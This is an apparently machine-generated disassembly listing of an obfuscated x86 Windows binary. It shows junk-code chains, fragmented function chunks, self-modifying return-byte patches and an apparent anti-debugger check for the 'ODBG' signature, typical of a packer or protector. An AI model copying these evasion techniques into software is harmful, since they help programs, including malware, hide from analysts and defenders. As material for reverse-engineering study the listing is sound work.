; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4511CB:				; CODE XREF: sub_4448E2+BCE9j
		sbb	eax, edi
		xchg	eax, edi

loc_4511CF:				; CODE XREF: sub_4448E2-797Bj
					; y2kk37jd:loc_44A9D5j	...
		push	offset loc_4472EA
		jmp	nullsub_228
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45484D

loc_4511D9:				; CODE XREF: sub_45484D+17j
		jnz	loc_44F7BC
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 4
		mov	eax, [ebp-4]
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+8]
		jmp	loc_44D513
; END OF FUNCTION CHUNK	FOR sub_45484D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452995

loc_4511F4:				; CODE XREF: sub_452995:loc_44BCBAj
		jz	loc_43FB33
		jmp	loc_451CE3
; END OF FUNCTION CHUNK	FOR sub_452995
; ---------------------------------------------------------------------------

loc_4511FF:				; CODE XREF: y2kk37jd:loc_4432B8j
		xor	edi, 2CDD17BDh
		and	edi, 0F2641E1Dh

; =============== S U B	R O U T	I N E =======================================



sub_45120B	proc near		; CODE XREF: sub_43DA24j

; FUNCTION CHUNK AT 00440616 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004478B8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004577A4 SIZE 00000005 BYTES

		add	edi, 1E049EFEh
		popf
		jmp	loc_4577A4
sub_45120B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	edx, 6264DA23h
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_45121D:				; CODE XREF: sub_4507BF:loc_45BF16j
		jmp	sub_43FDF2
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_451222:				; CODE XREF: y2kk37jd:loc_44D268j
		call	sub_447041
		mov	eax, 147A4491h
		call	sub_442C3E
		push	edx
		push	0C978DD70h
		pop	edx
		jmp	loc_444B29
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_344. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45123E:				; CODE XREF: y2kk37jd:loc_457CF6j
		push	ebp
		call	sub_447166
; START	OF FUNCTION CHUNK FOR sub_440FDF

loc_451244:				; CODE XREF: sub_440FDF+5j
		jmp	loc_43FA8C
; END OF FUNCTION CHUNK	FOR sub_440FDF
; ---------------------------------------------------------------------------
		adc	eax, ebx
		jmp	loc_45C0FE
; ---------------------------------------------------------------------------

loc_451250:				; CODE XREF: y2kk37jd:00447A9Cj
		push	2D8AF489h

loc_451255:				; CODE XREF: y2kk37jd:00447A84j
		add	esi, 424A30ADh
		push	offset sub_44C87D
		jmp	locret_4529A2
; ---------------------------------------------------------------------------

loc_451265:				; CODE XREF: y2kk37jd:00445E82j
		jns	loc_44C117
		ja	loc_4402DD
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_451271:				; CODE XREF: sub_45136B:loc_445E71j
		xor	edx, 11F3B214h
		add	edx, ebp
		jmp	loc_455BBA
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_442409
		jmp	loc_443E71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45128B:				; CODE XREF: sub_45689F:loc_44AFC9j
		jno	loc_43E530
		rol	eax, 0Bh
		mov	ecx, edx
		cmp	ebx, 9DC3A4F8h

loc_45129C:				; CODE XREF: sub_4440AB:loc_44B537j
		jmp	loc_442E56
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4512A1:				; CODE XREF: sub_45B7AA-151ECj
		pushf
		sub	esi, 3C8F174Dh

loc_4512A8:				; CODE XREF: sub_45B7AA:loc_43B9B8j
					; sub_45B7AA:loc_450C11j ...
		jno	loc_442A06
		cmp	dword ptr [ebp-4], 3
		jnz	loc_4533E7
		jmp	loc_455DA3
; END OF FUNCTION CHUNK	FOR sub_45B7AA

; =============== S U B	R O U T	I N E =======================================



sub_4512BD	proc near		; DATA XREF: y2kk37jd:0045B8EBo
		mov	eax, [esp+0]
		call	sub_4589B7
sub_4512BD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_449734

loc_4512C5:				; CODE XREF: sub_449734:loc_44030Dj
		jnz	loc_450EB2
; END OF FUNCTION CHUNK	FOR sub_449734
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_4512CB:				; CODE XREF: sub_44CF38-5341j
		jmp	loc_453F9F
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2EB

loc_4512D0:				; CODE XREF: sub_43B2EB+Dj
		jmp	loc_43E760
; END OF FUNCTION CHUNK	FOR sub_43B2EB
; ---------------------------------------------------------------------------
		xor	ecx, esi
		cmp	ecx, edx
		jmp	loc_446D97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4512DE:				; CODE XREF: sub_4411C3:loc_4422C8j
					; DATA XREF: y2kk37jd:00453E8Bo
		lea	eax, sub_43C638
		mov	byte ptr [eax],	0C3h
		jmp	sub_43C638
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C638

loc_4512EC:				; CODE XREF: sub_43C638j
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_459622
; END OF FUNCTION CHUNK	FOR sub_43C638
; ---------------------------------------------------------------------------
		mov	eax, 0CE6B079Ah
		call	sub_45618C
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_4512FF:				; CODE XREF: sub_44F641:loc_4510F5j
		jnz	loc_45620B
		jmp	loc_45AC81
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_45130A:				; CODE XREF: sub_445787+D411j
					; y2kk37jd:00452BA7j
		add	eax, 408BBE5h
		call	sub_442C3E
		push	edx
		push	0C8E0EA63h
		pop	edx
		sub	edx, 0A025E244h
		jmp	loc_43B056
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_451327:				; CODE XREF: sub_45380A-E84Bj
		jz	loc_440AE8
		call	sub_43CB82
		jnz	loc_440AE8
		push	offset sub_451BD9
		jmp	nullsub_107
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_451342:				; CODE XREF: sub_4447EA+14A78j
		jl	loc_44C597

loc_451348:				; CODE XREF: sub_44B924+F9BFj
		jmp	loc_45B00E
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45913D

loc_45134D:				; CODE XREF: sub_45913D+16j
		jmp	loc_457831
; END OF FUNCTION CHUNK	FOR sub_45913D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_451352:				; CODE XREF: sub_44AC89+Aj
		jmp	loc_4433B3
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		add	ebx, 3E99B93Bh
		or	ecx, 69D01AD6h

loc_451363:				; CODE XREF: y2kk37jd:loc_43C467j
		mov	ebx, [ebp+0]
		jmp	loc_44C58F

; =============== S U B	R O U T	I N E =======================================



sub_45136B	proc near		; CODE XREF: y2kk37jd:0044D755j
					; sub_43ED19+10895p

; FUNCTION CHUNK AT 0043B29B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B5CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FADA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F72 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004439B9 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004442B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445E71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ACCC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E26A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451271 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452102 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452BD8 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00454422 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455BBA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457170 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458166 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458FEC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045B72C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045BD69 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0D1EFE96Dh
		pop	ebx
		or	ebx, 7CC7402h
		and	ebx, 0E38E7876h
		add	ebx, 146F58E3h
		add	eax, ebx
		jmp	loc_441F72
sub_45136B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_45138E:				; CODE XREF: sub_43C851:loc_44784Aj
		add	eax, edx
		pop	edx
		mov	eax, [eax]
		add	eax, 4
		mov	[ebp-10h], eax

loc_451399:				; CODE XREF: sub_45922C:loc_44CE71j
		jmp	loc_448AF6
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459F8F

loc_45139E:				; CODE XREF: sub_459F8F+1j
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+0]
		mov	[ebp-4], eax
		push	0EB161082h
		jmp	loc_450626
; END OF FUNCTION CHUNK	FOR sub_459F8F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4513B3:				; CODE XREF: sub_454539-8E56j
		test	eax, 8000000h
		jmp	loc_44BFF0
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
		jl	loc_458857
		jmp	loc_44B486
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4513C9:				; CODE XREF: sub_43ED19+20F2j
					; sub_43ED19+13D25j ...
		jmp	loc_43EA3F
; ---------------------------------------------------------------------------

loc_4513CE:				; CODE XREF: sub_43ED19+F373j
					; y2kk37jd:00456DA0j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4513D1:				; CODE XREF: sub_448CAE-F01j
		jmp	loc_45080E
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FAC

loc_4513D6:				; CODE XREF: sub_442FAC+10j
		jmp	loc_45967E
; END OF FUNCTION CHUNK	FOR sub_442FAC

; =============== S U B	R O U T	I N E =======================================



sub_4513DB	proc near		; CODE XREF: y2kk37jd:00445040p
					; y2kk37jd:00448FB3p ...

; FUNCTION CHUNK AT 0044018B SIZE 00000005 BYTES

		push	offset sub_44DA7D
		jmp	loc_44018B
sub_4513DB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4513E5:				; CODE XREF: sub_44AC89+F962j
		ror	eax, 11h
		sbb	ecx, 0F637A5DEh
		jmp	loc_452635
; END OF FUNCTION CHUNK	FOR sub_44AC89

; =============== S U B	R O U T	I N E =======================================



sub_4513F3	proc near		; CODE XREF: sub_43B427+38A5j
		push	ebx
sub_4513F3	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43B427

loc_4513F4:				; CODE XREF: sub_43B427:loc_43ECC4j
		add	edx, 0B48AA7C9h
		xor	eax, edx
		pop	edx
		sub	eax, 0D27C33E5h
		mov	ds:dword_457510, eax
; END OF FUNCTION CHUNK	FOR sub_43B427
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_451409:				; CODE XREF: sub_457FDC-122ECj
					; sub_4408B9+180B1j
		add	eax, 0D27C33E5h
		push	edi
		jmp	loc_454C86
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------

loc_451415:				; CODE XREF: y2kk37jd:0045A83Fj
		jge	loc_45326D

; =============== S U B	R O U T	I N E =======================================



sub_45141B	proc near		; CODE XREF: y2kk37jd:004556CBp

; FUNCTION CHUNK AT 004570EC SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0E6D333A1h
		pop	edx
		xor	edx, 0FE136B40h
		jnz	loc_4570EC
sub_45141B	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4432FD

loc_451431:				; CODE XREF: sub_4432FD+3931j
		jmp	loc_43C60B
; END OF FUNCTION CHUNK	FOR sub_4432FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C3AC

loc_451436:				; CODE XREF: sub_45C3AC+16j
		sub	eax, 0E6E7B047h
		add	eax, 661D4411h
		xchg	eax, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_45C3AC
; ---------------------------------------------------------------------------
		mov	ds:dword_41E104, eax
		lea	eax, nullsub_261
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_261
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_4438A1

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_451464	proc near		; DATA XREF: sub_447832:loc_45BD22o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B128 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043B343 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043C66F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004405E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440E81 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441B6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B4E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004446C9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445F37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A7DC SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+0]

loc_45146D:				; CODE XREF: sub_44CEAB+125Fj
		mov	esp, ebp
		jmp	loc_445F37
sub_451464	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4435B9

loc_451475:				; CODE XREF: sub_4435B9+11j
		jnz	loc_43C999
		jmp	loc_4464DA
; END OF FUNCTION CHUNK	FOR sub_4435B9
; ---------------------------------------------------------------------------

loc_451480:				; CODE XREF: y2kk37jd:00454F05j
		jnp	loc_4550B3

; =============== S U B	R O U T	I N E =======================================



sub_451486	proc near		; CODE XREF: y2kk37jd:00442E6Ep
		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [eax+60h]
sub_451486	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44255B

loc_45148D:				; CODE XREF: sub_44255B+8F1Ej
		add	eax, [ebp-4]
		mov	[ebp-14h], eax
		mov	eax, [ebp-14h]
		jmp	loc_444AEE
; END OF FUNCTION CHUNK	FOR sub_44255B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_45149B:				; CODE XREF: sub_44D302:loc_44901Ej
		mov	[ebp-20h], eax
		jmp	loc_4441E9
; ---------------------------------------------------------------------------

loc_4514A3:				; CODE XREF: sub_44D302:loc_450848j
		test	byte ptr [ebp-7], 8
		jz	loc_455E4E
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_44DE80
		pop	ecx
		jmp	loc_4441E6
; END OF FUNCTION CHUNK	FOR sub_44D302

; =============== S U B	R O U T	I N E =======================================



sub_4514BC	proc near		; CODE XREF: sub_455958-18127p
					; sub_453F01+17j

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		add	ecx, 0CC9050E5h
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_442C3E
sub_4514BC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4514CE	proc near		; DATA XREF: sub_44D302+9CAEo
		shl	eax, 8
		mov	edx, [ebp-20h]
		movzx	edx, byte ptr [edx]
		or	eax, edx
		call	sub_452458
sub_4514CE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4514DE	proc near		; CODE XREF: sub_445568-48F3p
					; y2kk37jd:0044B547j

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D2F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D613 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DA12 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043FE46 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440342 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443A80 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443F3F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444DB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004461DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446EC9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044733C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004475C4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447A46 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004489E1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004494B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AD71 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E1C3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E7C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E82B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EEA8 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044F9AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450AF2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452368 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452784 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00452E53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453039 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045479F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00454A50 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456246 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004563DB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045666D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456C56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E35 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004595EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A108 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045AEA2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B024 SIZE 0000000B BYTES

		xchg	ecx, [esp+0Ch+var_C]
		pop	ecx

loc_4514E2:				; CODE XREF: sub_43E679+12F6Dj
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_4494B4
sub_4514DE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4514F3:				; CODE XREF: y2kk37jd:0044453Fj
		cmp	ebx, 33BDCDAh
		jmp	loc_446551
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4487FD

loc_4514FE:				; CODE XREF: sub_4487FD+6BC8j
		mov	al, [eax]
		jnz	loc_45AD15
		call	sub_43F770

loc_45150B:				; CODE XREF: sub_452A28+8j
		jmp	loc_458464
; END OF FUNCTION CHUNK	FOR sub_4487FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4474C5

loc_451510:				; CODE XREF: sub_4474C5:loc_4474D2j
		jmp	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_4474C5

; =============== S U B	R O U T	I N E =======================================



sub_451515	proc near		; DATA XREF: sub_44CF38-2095o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E0BF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B898 SIZE 00000005 BYTES

		or	eax, ecx
		sbb	eax, 0E1A21E32h
		pop	eax
		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		pop	ecx
		jmp	loc_43E0BF
sub_451515	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_467. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE0D

loc_45152B:				; CODE XREF: sub_45BE0D-3812j
		jmp	nullsub_412
; END OF FUNCTION CHUNK	FOR sub_45BE0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_451530:				; CODE XREF: sub_44C304:loc_44A860j
		jnz	loc_43D783
		jmp	loc_443F18
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B60B

loc_45153B:				; CODE XREF: sub_45B60B:loc_441A03j
		xchg	edx, [esp+0Ch+var_C]
		jmp	loc_457315
; END OF FUNCTION CHUNK	FOR sub_45B60B
; ---------------------------------------------------------------------------

loc_451543:				; CODE XREF: y2kk37jd:0044F253j
		jnz	loc_4571B0
		add	edi, eax
		rol	eax, 1Ch

loc_45154E:				; CODE XREF: y2kk37jd:00459B4Ej
		or	edi, 0E05993D9h
		sub	edi, 2877774h
		test	edi, 4000000h
		jmp	loc_4435CF

; =============== S U B	R O U T	I N E =======================================



sub_451565	proc near		; CODE XREF: sub_45689F-1A5EAp
					; y2kk37jd:0044746Fj
		xchg	ecx, [esp+0]
		pop	ecx
		mov	[esi], eax
		call	sub_449E69

loc_451570:				; CODE XREF: sub_446718+12E8Fj
		jmp	sub_43D0C9
sub_451565	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444463

loc_451575:				; CODE XREF: sub_444463-2EFFj
		jmp	loc_4561A6
; END OF FUNCTION CHUNK	FOR sub_444463

; =============== S U B	R O U T	I N E =======================================



sub_45157A	proc near		; CODE XREF: y2kk37jd:0045B597j
					; sub_455DDE:loc_45B9DAp

; FUNCTION CHUNK AT 0043F8F1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444EBC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450F4E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454357 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebx
		push	91BDAA1Ah
		jmp	loc_454357
sub_45157A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_451589:				; CODE XREF: sub_4599BE-E8F3j
		push	1F5BC655h
		jb	loc_441A12
		sbb	ebx, 0D4CA23D9h
		sbb	ecx, ebx
		not	eax
		jmp	loc_44D797
; END OF FUNCTION CHUNK	FOR sub_4599BE

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_4515A3	proc near		; CODE XREF: sub_441FCA+20D6j
		retn
sub_4515A3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_4515A4:				; CODE XREF: sub_449C4F+Cj
		jmp	loc_44D784
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------

loc_4515A9:				; CODE XREF: y2kk37jd:loc_44D43Aj
		jnz	loc_44F05A
		jmp	loc_4587AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45562F

loc_4515B4:				; CODE XREF: sub_45562F+Dj
		and	ebp, edx
		xor	edi, ecx
; END OF FUNCTION CHUNK	FOR sub_45562F
; START	OF FUNCTION CHUNK FOR sub_455C2D

loc_4515B8:				; CODE XREF: sub_455C2D:loc_43FDB7j
		push	0
		push	0
		push	10h
		jmp	loc_447564
; END OF FUNCTION CHUNK	FOR sub_455C2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_4515C3:				; CODE XREF: sub_4450D1:loc_4477D8j
		mov	[ecx], eax
		pop	ecx
		lea	eax, loc_450A68
		mov	byte ptr [eax],	0C3h
		jmp	loc_450A68
; ---------------------------------------------------------------------------

loc_4515D4:				; CODE XREF: sub_4450D1+B99Dj
		mov	eax, [esp+4+var_4]
		jmp	loc_450541
; END OF FUNCTION CHUNK	FOR sub_4450D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_4515DC:				; CODE XREF: sub_43E679:loc_448C20j
		xor	ebp, ecx
		jnb	loc_452EF2
		xor	edx, eax
		js	loc_4514E2
		jmp	loc_441705
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
		mov	eax, 726FC43Ah
		call	sub_442C3E
		push	esi
		push	2C2BD95Dh
		pop	esi
		jmp	loc_45A4E5
; ---------------------------------------------------------------------------
		push	edi
		push	0ED8C9F3Fh
		xchg	eax, [esp]
		mov	edi, eax
		jmp	loc_441ABD
; ---------------------------------------------------------------------------
		sbb	ebx, 68B0DF08h
		jmp	sub_45219E
; ---------------------------------------------------------------------------

loc_451622:				; CODE XREF: y2kk37jd:0044F833j
		pop	ebx
		and	ebx, 0D7EDB4B3h
		test	ebx, 20000h
		jmp	loc_44FBEB

; =============== S U B	R O U T	I N E =======================================



sub_451634	proc near		; CODE XREF: sub_454B16-97D3p
					; y2kk37jd:00453F4Ej

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B978 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043C24B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043CABE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004423E9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442D6F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004477F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A02B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BFC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451CE8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004526CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454284 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045458E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A2D8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B1BC SIZE 00000007 BYTES

		xchg	ebx, [esp+10h+var_10]
		pop	ebx
		mov	edx, eax
		call	sub_4581BB
		call	sub_43BA66
		or	eax, eax
		jnz	loc_43B978
		jmp	loc_44A02B
sub_451634	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448865

loc_451652:				; CODE XREF: sub_448865+Aj
		jmp	nullsub_501
; END OF FUNCTION CHUNK	FOR sub_448865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_451657:				; CODE XREF: sub_45689F-18F0Aj
		cmp	al, 0A4h

loc_451659:				; CODE XREF: sub_4411C3:loc_451675j
		jz	loc_4565B3
		jmp	loc_441818
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_451664:				; CODE XREF: sub_44AAA1-44B8j
		jnz	loc_447C9C
		jnb	loc_448B7D
		jmp	loc_447C93
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_451675:				; CODE XREF: sub_4411C3-5679j
		jno	loc_451659
		or	ebp, ebx
		jmp	loc_45BC96
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_451682	proc near		; DATA XREF: sub_43F8B8:loc_43D5B7o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004413F2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445129 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B5C1 SIZE 00000010 BYTES

		add	esi, 73CC8A23h
		sub	eax, esi
		xchg	eax, [esp+0]
		mov	esi, eax
		pop	eax
		jmp	loc_45B5C1
sub_451682	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_451695:				; CODE XREF: y2kk37jd:loc_451D33j
		jz	loc_44831D
		jmp	loc_450BCC
; ---------------------------------------------------------------------------

loc_4516A0:				; CODE XREF: y2kk37jd:00445F5Fj
		jnz	loc_450619
		jmp	loc_44523B
; ---------------------------------------------------------------------------
		db 72h
dword_4516AC	dd 1959DFAh		; DATA XREF: y2kk37jd:0043EA64w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508C4

loc_4516B0:				; CODE XREF: sub_4508C4+Dj
